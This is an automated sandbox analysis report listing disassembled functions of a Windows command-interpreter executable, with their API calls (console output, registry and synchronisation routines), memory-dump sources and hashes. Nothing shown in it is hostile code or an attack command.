                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$iswdigit$wcstol
                                                                                                          • String ID:
                                                                                                          • API String ID: 3841054028-0
                                                                                                          • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                          • Instruction ID: befbe0abb573be2e0aa651429bb4704136f35f1dfeaba73ae69ea118909c752e
                                                                                                          • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                          • Instruction Fuzzy Hash: 2D51A76690755281E766AB1DF4001B9BAA1FF68758BC68231DE6E832F4FF3CE451C230
                                                                                                          Function 00007FF7AB1334A0 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB133514
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB133522
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB133541
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB13355E
                                                                                                            • Part of subcall function 00007FF7AB1336EC: _get_osfhandle.MSVCRT ref: 00007FF7AB133715
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB133770
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB133791
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 4057327938-0
                                                                                                          • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                          • Instruction ID: e86119bcd6c09c62dc151bd53d74fe61b768fe7138b18aa80ab55155fe7b0f06
                                                                                                          • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                          • Instruction Fuzzy Hash: 9D318322E0A60286E7967B1DF444079F6A0FF89748FD65135D90E433B5EF3CE8498720
                                                                                                          Function 00007FF7AB1454B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB1454E6
                                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB14552E
                                                                                                            • Part of subcall function 00007FF7AB14758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7AB146999,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB1475AE
                                                                                                            • Part of subcall function 00007FF7AB14758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7AB146999,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB1475C6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                          • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                          • API String ID: 779401067-630742106
                                                                                                          • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                          • Instruction ID: 068108f11691cd38fb69f9a504f75309029438aa0c5074cee22e65278b6afdfe
                                                                                                          • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                          • Instruction Fuzzy Hash: A75185B261968281EB12AB19F4407FAE761FF8478CFD24031EA4D8BA75EE7DD505C720
                                                                                                          Function 00007FF7AB1258D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                          • API String ID: 3677997916-3870813718
                                                                                                          • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                          • Instruction ID: 1cbb613715ebb9b8ff69e808273d2b6720aa2aa1e8b704bb7edb11b3f315389a
                                                                                                          • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                          • Instruction Fuzzy Hash: 3A110A7661AA41C7EB119B58F48466AF7A4FB89768F814235DA8D0377CDF7CD048CB10
                                                                                                          Function 00007FF7AB124C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcsrchr$wcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 110935159-0
                                                                                                          • Opcode ID: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                                          • Instruction ID: 3e71a80c6363e39b8fa977fa23fabc4189ef155862b23c78e5e4b0753237e03c
                                                                                                          • Opcode Fuzzy Hash: c69a388bc8b3a3ff16e2786c96b1100a2dbfc28b8c9e9179231870a23454a700
                                                                                                          • Instruction Fuzzy Hash: D551D862B0A78685FE22AB19F4003F9D290BF59BACF964531CE5D4B7B4EE3CD5458310
                                                                                                          Function 00007FF7AB12B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB12B4BD
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306D6
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306F0
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB13074D
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB130762
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB12B518
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB12B58B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                          • String ID: ELSE$IF/?
                                                                                                          • API String ID: 3223794493-1134991328
                                                                                                          • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                          • Instruction ID: b4b62f9743cb5160e610794e5d42d3ab61ae9b845c1e834275842a910d89e095
                                                                                                          • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                          • Instruction Fuzzy Hash: 9F418A21E0B643C1FB56BB2CF4912BAA2A1AF44748FDA4435D60E072B5EE3DE8448760
                                                                                                          Function 00007FF7AB14A73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A77A
                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A7AF
                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A80E
                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A839
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A850
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$CloseErrorLastOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2240656346-0
                                                                                                          • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                          • Instruction ID: e2a137e8acfb2b36b0fe94d2dc5ea63b1329263d4349d3f318ff1510d3a492de
                                                                                                          • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                                          • Instruction Fuzzy Hash: 7731937262AA8282E7529F19F440479F7A4FF88795F964134EA4E43774EF3CD481CB10
                                                                                                          Function 00007FF7AB14D0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1301B8: _get_osfhandle.MSVCRT ref: 00007FF7AB1301C4
                                                                                                            • Part of subcall function 00007FF7AB1301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB1301D6
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB14D0F9
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7AB14D10F
                                                                                                          • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7AB14D166
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB14D17A
                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7AB14D18C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3008996577-0
                                                                                                          • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                          • Instruction ID: 6528426f2a6235511c4b8ba08a261f9048e481811f33dc54597ef47eb3e98fc9
                                                                                                          • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                                          • Instruction Fuzzy Hash: 52215C26B25A51CAE701AB79F4400BDB7B0FB4DB48B855225EE0E53B68EF38D044CB24
                                                                                                          Function 00007FF7AB145770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateSemaphore
                                                                                                          • String ID: _p0$wil
                                                                                                          • API String ID: 1078844751-1814513734
                                                                                                          • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                          • Instruction ID: 848254be0c9f0fc6057eed8ad99b1d7b167b1acc01a35dc59e8cb5771495338c
                                                                                                          • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                                          • Instruction Fuzzy Hash: 4251D6B2B1B64286EE23AB1DE4542B9E290AF8479CFD64535DA0D077B5EE3DE4058320
                                                                                                          Function 00007FF7AB14FB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$DiskFreeSpace
                                                                                                          • String ID: %5lu
                                                                                                          • API String ID: 2448137811-2100233843
                                                                                                          • Opcode ID: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                                          • Instruction ID: 29d018fb74b7e924bc73830284a0ec934adda2662e2644f7277845cdf0ea8951
                                                                                                          • Opcode Fuzzy Hash: 91b9902f1ee4f2c69dd88f1cc13d7b02493769e4bbf5f2682aca5e24acde37c3
                                                                                                          • Instruction Fuzzy Hash: A8418F7270AAC185EB62EF19F8446EAB760FB85788F818135DA4D0B768DF7CD249C710
                                                                                                          Function 00007FF7AB14B89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF7AB14B934
                                                                                                          • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7AB135085), ref: 00007FF7AB14B9A5
                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7AB135085), ref: 00007FF7AB14B9F7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                          • String ID: %WINDOWS_COPYRIGHT%
                                                                                                          • API String ID: 1103618819-1745581171
                                                                                                          • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                          • Instruction ID: e1bc2d33ac69ab3b823338df7da5ca9f83cab449d26001522d2869cb45c017c0
                                                                                                          • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                                          • Instruction Fuzzy Hash: 5541B7A290A78582EA119F1DF490279B7A0FB58B98FC64235DE4D033B5EF3DE485C710
                                                                                                          Function 00007FF7AB150774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset$_wcslwr
                                                                                                          • String ID: [%s]
                                                                                                          • API String ID: 886762496-302437576
                                                                                                          • Opcode ID: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                          • Instruction ID: 8d1f3e4eb93b0114cbb158e4caae41c6caa69f7e6dd261aa372cfab2b476413f
                                                                                                          • Opcode Fuzzy Hash: edde6ab5db54e3a5535b346c374fc5c976f6442aa931e6f93dfa572844f0dcb2
                                                                                                          • Instruction Fuzzy Hash: 1D318E32706B8285EB22DF29E8947E9A7A0FB49B88F854135CE4D47765DF3CD2498310
                                                                                                          Function 00007FF7AB149114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                          Download Yara Rule
